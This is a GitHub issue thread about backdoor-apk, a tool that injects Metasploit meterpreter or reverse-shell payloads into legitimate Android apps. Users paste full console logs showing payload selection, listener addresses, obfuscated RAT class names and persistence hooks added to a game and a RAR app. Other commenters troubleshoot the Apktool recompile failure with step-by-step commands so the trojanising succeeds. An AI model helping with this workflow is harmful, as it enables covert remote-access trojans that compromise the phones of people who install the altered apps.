### ISSUE TITLE
[!] Failed to recompile original project with backdoor

### ISSUE THREAD

**Issue by moonwolf63x** [dana-at-cp/backdoor-apk#159] opened 2018-10-14 09:43 UTC
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Sun Oct 14 15:10:35 IST 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 1
[?] Please enter an LHOST value: 127.0.0.1
[?] Please enter an LPORT value: 2222
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/dotgears/flapfire
[+] Smali file to hook RAT payload: com/dotgears/GameApplication.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[+] Keeping permissions of original project
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/dotgears/flapfire/jcxww
[+] Generated new smali class name for MainBroadcastReceiver.smali: Ruuae
[+] Generated new smali class name for MainService.smali: Jkfvo
[+] Generated new smali class name for Payload.smali: Qadee
[+] Generated new smali class name for StringObfuscator.smali: Ljjis
[+] Generated new smali method name for StringObfuscator.obfuscate method: tsewz
[+] Generated new smali method name for StringObfuscator.unobfuscate method: ohcbm
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[+] Unable to add persistence hook due to missing permission
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

How to solve...

**Comment by italiangrubber** [comment] 2018-10-17 22:10
Same problem here! I've kali linux on x64

**Comment by dana-at-cp** [comment] 2018-10-22 21:38
@moonwolf63x @italiangrubber All recompilation issues involve Apktool. Have you tried to decompile/recompile the APKs in question using Apktool on it's own? That's the best place to start when you first face a recompilation issue. If Apktool can't decompile/recompile the APK then that is the root cause.

**Comment by WiredLife** [comment] 2018-12-09 11:42
1. replace the kali apktool with this
https://ibotpeaches.github.io/Apktool/install/
2. run
apktool empty-framework-dir
./cleanup.sh
3. run
./backdoor-apk.sh host.apk
4. must work ;)

**Comment by dsx12** [comment] 2018-12-30 07:42
@WiredLife  I replaced the apktool with latest version (2.3.4-1) and still doesn't work :/... Any fix?

**Comment by dsx12** [comment] 2018-12-30 07:46
Is there a alternative tool other than apktool to rebuild decompiled apks that successfully works?

**Comment by Arifulislambisal** [comment] 2019-02-10 13:32
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Sun Feb 10 05:29:56 PST 2019
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.127
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/rarlab/rar
[+] Smali file to hook RAT payload: com/rarlab/rar/App.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/rarlab/rar/ckxvv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Admtk
[+] Generated new smali class name for MainService.smali: Pscnh
[+] Generated new smali class name for Payload.smali: Kferu
[+] Generated new smali class name for StringObfuscator.smali: Jmxcv
[+] Generated new smali method name for StringObfuscator.obfuscate method: txkdg
[+] Generated new smali method name for StringObfuscator.unobfuscate method: oowor
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
.
.
Any solution?

**Comment by FirstClickin** [comment] 2019-05-06 05:32
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

**Comment by dana-at-cp** [comment] 2019-05-21 20:27
@WiredLife is on the right track. Check out #168

**Closed as completed** 2019-05-21 20:27 UTC
Labels: invalid
